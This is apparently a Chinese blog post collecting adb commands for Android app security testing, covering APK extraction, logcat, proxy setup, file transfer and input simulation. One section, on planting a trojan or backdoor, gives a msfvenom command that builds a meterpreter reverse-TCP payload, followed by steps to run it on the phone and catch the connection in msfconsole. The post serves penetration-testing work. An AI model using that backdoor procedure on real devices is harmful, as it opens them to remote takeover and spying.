关于adb的一些常用命令
本文PDF格式的文档
在做APP安全测试时(Android端)除了业务逻辑,也会经常要用一些adb命令,在此记录一下。
adb下载地址
https://adbshell.com/downloads
Android SDK 平台工具软件包(含adb,有windows、Linux、MacOS版本)
https://developer.android.google.cn/studio/releases/platform-tools
一些思路小记
1、提取apk文件
1 | # 1.获取当前屏幕上正在运行的APP的包名和类名(获取包名,已知包名可忽略此步骤) |
2、查看logcat日志信息
首推 Android Device Monitor,很好用(界面化工具),可进行日志筛选、查找、导出等。
Tips:Android Device Monitor 已在Android Studio 3.1及以上版本中弃用,可自行下载 Android SDK 平台工具软件包 。
1 | # Android Device Monitor启动脚本路径 |
然后就是通过命令来看了
- 查看指定进程号的logcat日志 (推荐使用此方法,看到的日志比较全)
1 | # 根据包名、服务名查找PID(一个APP可能会有多个进程) |
- 打印从某个时间点开始的系统日志
1 | adb logcat -T "月-日 00:00:00.000" > <path/file-name> |
- 查看指定包名的logcat日志
1 | # 打印指定包名的logcat日志 |
Android logcat命令详解
https://www.cnblogs.com/jianxu/p/5468839.html
使用adb logcat命令显示Android设备上的Log日志
https://blog.csdn.net/wenzhi20102321/article/details/81058196
3、启动APP的方法
手动点击屏幕上的APP图标
借助frida强制重启APP(使用于某些场景,如没办法去点击APP图标)
1 | frida -U --no-pause -f <pkg> # 只需知道包名即可,不需要知道类名 |
- 使用adb命令启动APP
1 | adb shell am start -n <pkg>/<activity-name> |
4、植入木马/后门
- 查看手机CPU架构。
1 | adb shell cat /proc/cpuinfo |
- 使用msfvenom来生成木马/后门文件。
1 | msfvenom -a aarch64 --platform Linux -p linux/aarch64/meterperter_reverse_tcp -f elf LHOST=x.x.x.x LPORT=444 -o payload |
然后放到手机中(命令略)。
打开msf,进行监听。
1 | msfconsole |
去手机中运行木马/后门程序(使用shell或点击app)。
再去msf中看是否上线。
Tips:也可以安装其他木马/后门APP或远程协助类的APP
MSF入侵安卓手机
一些常用的adb命令
adb执行某些操作
1 | #获取所有包名 |
启动Android四大组件
1 | #启动Activity组件 |
传文件
1 | adb pull <手机路径> <本机路径> # 从手机中拉取信息到本地电脑上 |
adb配置wifi连接
保持手机电脑在同一个wifi。先用数据线连电脑,执行下面命令后即可拔掉数据线。
另推荐一个APP(可实现此功能):wifiadb
1 | adb shell ifconfig wanl0 # 在连接数据线的情况下查看手机IP地址 |
adb通过wifi连接android设备
adb设置系统代理
设置代理
1 | adb shell settings put global http_proxy <代理IP地址:端口号> |
移除代理
1 | adb shell settings delete global http_proxy && adb shell settings delete global global_http_proxy_host && adb shell settings delete global global_http_proxy_port && adb reboot |
注意:移除代理后要重启手机才能生效。设置代理可以多次设置,立即生效(即覆盖)。
使用第三方apk
AndroidProxySetter工具可以帮助我们使用adb命令可以快速进行wifi代理的设置和清除
GitHub地址:
https://github.com/jpkrause/AndroidProxySetter
下好apk后,安装到手机
adb install proxy-setter-debug-0.2.1.apk
设置代理
1 | adb shell am start -n tk.elevenk.proxysetter/.MainActivity -e host 代理IP地址 -e port 端口号 -e ssid WIFI名称 -e reset-wifi true -e key WIFI密码 |
如:
1 | adb shell am start -n tk.elevenk.proxysetter/.MainActivity -e host 127.0.0.1 -e port 8888 -e ssid YOUR-WIFI-NAME -e reset-wifi true -e key YOUR-WIFI-PASSWORD |
adb 修改手机代理方式
adb命令关闭指定APP
1 | adb shell am force-stop <pkg> |
查看进程
1 | #查找某个进程 |
文本输入
1 | adb shell input text '123' |
按键输入
1 | # 返回键 |
adb命令模拟按键事件 KeyCode
模拟屏幕点击
1 | # x,y为坐标位置 |
ADB——模拟手机按键输入
截屏和录屏
1 | #截屏并保存在手机上的指定路径 |
adb 截屏和录屏命令
https://blog.csdn.net/gdutxiaoxu/article/details/69802895
app自动化–Android使用adb命令录屏(上)
https://blog.csdn.net/atnanyang/article/details/86479449
Android SDK Platform Tools 下载地址(内含adb)
https://developer.android.google.cn/studio/releases/platform-tools
原文作者: à ō é
原文链接: https://laoel.github.io/2021/06/18/关于adb的一些常用命令/
版权声明: 转载请注明出处(必须保留原文作者署名原文链接)